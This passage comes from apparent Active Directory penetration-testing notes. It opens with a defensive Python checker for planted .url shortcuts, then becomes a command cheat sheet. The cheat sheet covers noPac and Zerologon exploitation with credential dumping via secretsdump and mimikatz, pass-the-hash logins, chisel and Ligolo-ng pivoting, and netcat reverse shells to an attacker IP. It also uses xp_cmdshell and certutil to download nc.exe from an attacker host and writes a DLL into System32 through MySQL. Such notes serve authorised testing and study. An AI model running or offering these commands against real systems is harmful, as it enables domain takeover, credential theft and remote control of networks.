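Seen from the defending side, the shortcut above has two tell-tale properties: a name that sorts to the top of the directory listing and an IconFile pointing at a UNC host (here with %USERNAME% embedded). The check below is an added example, not code from these notes or from the linked article; it parses .url content as the INI-style file it is and reports those properties, so it can be run over the .url files found on file shares. Both sample files are constructed.

```python
# Added example (not from the original notes): a defender-side check that
# reads a .url shortcut and reports the properties that make a planted
# shortcut coerce an outbound authentication when the share is browsed:
# a name that sorts first and IconFile/URL/WorkingDirectory values that
# point at a UNC host. Both sample shortcuts below are constructed.
import configparser
import re
from typing import List

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share\...
ENV_VAR = re.compile(r"%[A-Za-z_]+%")      # %USERNAME% and similar


def suspicious_url_file(filename: str, content: str) -> List[str]:
    """Return human-readable findings for one .url file; an empty list means nothing noteworthy."""
    findings: List[str] = []
    base = re.split(r"[\\/]", filename)[-1]
    if base[:1] in ("@", "~"):
        findings.append("file name starts with @ or ~ (sorts to the top of the directory listing)")
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(content)
    except configparser.Error:
        findings.append("malformed shortcut file")
        return findings
    if not parser.has_section("InternetShortcut"):
        return findings
    section = parser["InternetShortcut"]
    for key in ("IconFile", "URL", "WorkingDirectory"):
        value = section.get(key, "")
        host = UNC_HOST.match(value)
        if host:
            findings.append(f"{key} points at UNC host {host.group(1)}")
        var = ENV_VAR.search(value)
        if var:
            findings.append(f"{key} expands an environment variable ({var.group(0)})")
    return findings


# Constructed sample shortcuts (10.0.0.5 is a made-up address)
PLANTED_URL = "\n".join([
    "[InternetShortcut]",
    "URL=https://intranet.example/",
    r"WorkingDirectory=C:\Users\Public",
    r"IconFile=\\10.0.0.5\share\%USERNAME%.icon",
    "IconIndex=1",
])
BENIGN_URL = "\n".join([
    "[InternetShortcut]",
    "URL=https://intranet.example/",
    "IconIndex=0",
])

if __name__ == "__main__":
    for name, content in (("@test.url", PLANTED_URL), ("Intranet.url", BENIGN_URL)):
        print(name, suspicious_url_file(name, content))
```

A UNC IconFile is the property that matters: Explorer resolves it as soon as the folder is displayed, so the host it names receives an authentication attempt from every user who opens the share. Egress filtering of SMB to untrusted hosts and alerting on new .url files in writable shares cover the same case from the network and logging side.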

📂 Vulnerabilities

git clone https://github.com/Ridter/noPac.git
sudo python3 scanner.py <domain>/<username>:<password> -dc-ip <domain controller> -use-ldap

method1 interactive shell

# Use the full path to get files
sudo python3 noPac.py <domain>/<username>:<password> -dc-ip <domain controller> -dc-host <hostname> -shell --impersonate administrator -use-ldap

method2 using TGT_ccache_file

# specify the new username and password with administrator permission
sudo python3 noPac.py <domain>/<username>:<password> -dc-ip <domain controller> -dc-host <hostname> --impersonate administrator -use-ldap -target-name 'admin01' -new-pass 'Welcome123@'
# using cache file
export KRB5CCNAME=<TGT_ccache_file>
# showing Kerberos credentials cache
klist
# login method1
python3 psexec.py -k -no-pass <target>
# login method2
wmiexec.py -k -no-pass <target ip or FQDN> 

📂 Remote Tools

Windows

winrs

winrs -R:<host> -u:<username> -p:<password> cmd

📂 Pivoting with chisel & proxychains

reference

attacker

# ./chisel server -p 80 --reverse -v
./chisel server -p <attacker port> --reverse -v

target

Windows

.\chisel.exe client <attacker ip>:<attacker port> R:socks

Linux

# forward the target's service on port 1234 to our pc (192.168.10.100) on port 5678
# ./chisel client 192.168.10.100:80 R:5678:localhost:1234
# nmap -sC -sV -p5678 192.168.10.100 -Pn
./chisel client <attacker ip>:<attacker port> R:<attacker service port>:localhost:<target service port>

using proxychains

cat /etc/proxychains4.conf
# using socks5
# #socks4         127.0.0.1 9050
# socks5  127.0.0.1 1080

proxychains evil-winrm -i '<target ip>' -u '<username>'
proxychains impacket-psexec "<username>":'<password>'@<target ip>
# certutil -urlcache -split -f "<remote_file_path>" "<local_file_path>"
# certutil -urlcache -split -f "http://<attacker ip>/nc.exe" "C:\Users\<username>\Desktop\nc.exe"

additional use

port forwarding to access MySQL

/* attacker */
./chisel server -p 4547 --reverse -v
/* target */
.\chisel.exe client 192.168.10.100:4547 R:4748:localhost:3306

/* MySQL */
mysql -h 127.0.0.1 -P 4748 -u root --password=''
SELECT LOAD_FILE('C:\\Windows\\System32\\drivers\\etc\\hosts') AS Result;
SELECT LOAD_FILE('C:\\Users\\Public\\Documents\\poc.dll') INTO DUMPFILE "C:\\Windows\\System32\\poc.dll";

📂 Pivoting with Ligolo-ng

https://www.youtube.com/watch?v=DM1B8S80EvQ

https://github.com/nicocha30/ligolo-ng/releases

target internal address

10.11.20.0/24

target A 10.11.20.100
target B 10.11.20.110

step1. attacker machine

$ sudo ip tuntap add user kali mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -selfcert

step2. target A machine

# 11601 is Ligolo-ng default listen port
.\agent.exe -connect <attacker ip>:11601 -ignore-cert

step3. attacker machine

new terminal

$ sudo ip route add <target internal address>/<Netmask> dev ligolo # 10.11.20.0/24
$ ip route list

step4. attacker machine

org terminal Ligolo-ng

ligolo-ng >> session # select the agent
ligolo-ng >> start

step5. attacker machine

We can start the scanning now

crackmapexec smb <target internal address>/<Netmask>

step6. attacker machine

add listener

ligolo-ng >> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 # for reverse shell
ligolo-ng >> listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:8000 # for downloading files
ligolo-ng >> listener_list

step7. attacker machine

new terminal

$ sudo nc -nlvp 4444

step8. target B machine

.\nc.exe -e cmd.exe <target A machine> <target A machine listen port> 
# .\nc.exe -e cmd.exe 10.11.20.100 1234
# 1234 => 4444

step9. attacker machine get a shell

📂 MSSQL

Extract hash from MDF

john --format=mssql12 --wordlist=<rockyou.txt> hash
/* python3 mssqlclient.py [[domain/]username[:password]@]<targetName or ip> */
/* sysadmin fixed server role */
enable_xp_cmdshell
xp_cmdshell "powershell.exe wget http://<attacker ip>/nc.exe -OutFile c:\\Users\Public\\nc.exe"
xp_cmdshell  "c:\\Users\Public\\nc.exe -e cmd.exe <attacker ip> <attacker port>"

📂 Zerologon

https://github.com/VoidSec/CVE-2020-1472

./cve-2020-1472-exploit.py -n <DC_NAME> -t <dc-ip>
# [+] Success: Target is vulnerable!                                                                                                         
# [-] Do you want to continue and exploit the Zerologon vulnerability? [N]/y 
# y
# [+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.
python secretsdump.py -no-pass -just-dc <domain>/'DC_NETBIOS_NAME$'@<dc-ip>
# e.g., python secretsdump.py -no-pass -just-dc test.local/'USER01$'@10.10.10.168
# remote login
impacket-psexec "<username>":@<target ip> -hashes "<NTLM hash>"
# WinRM default port 5985
evil-winrm -i <target ip> -u <username> -H '<NTLM hash>'

📂 AD Recycle Bin

find hidden information

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

📂 GPO Abuse

https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/gpo-abuse
https://github.com/FSecureLABS/SharpGPOAbuse

Permission : GpoEditDeleteModifySecurity

📂 tool debug

ticket_converter.py (converts tickets between UNIX and Windows formats)

ImportError: cannot import name 'KeyBlock' from 'impacket.krb5.ccache'

Fix: change KeyBlock to KeyBlockV4 in the script.

Mimikatz

Try using an older version.

sekurlsa::logonpasswords
mimikatz # ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

Try using the latest version.

mimikatz # ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

📂 Test Environment

First we have to set up the AD server; we can use the evaluation edition of Windows Server. I chose to download the VHD version.

https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2022#Get-started

Use the previously downloaded VHD file to create a virtual machine.

After creating the virtual machine, switch the network to bridged.

Install the AD service.

Create the domain controller.

Add a new forest.

Create a user account.

The AD server and user account are ready. Next we create a client PC environment. We can download the ISO file and use it to create a virtual machine.

https://www.microsoft.com/en-us/software-download/windows11

Remember to switch the client virtual machine's network to bridged too. You can also test whether the connection from the client to the AD server works.

Set up the DNS server on the client PC; the DNS server address is the AD server's address.

Now we can join the domain. (If you get an error when joining, try disabling IPv6.)

Disable IPv6.
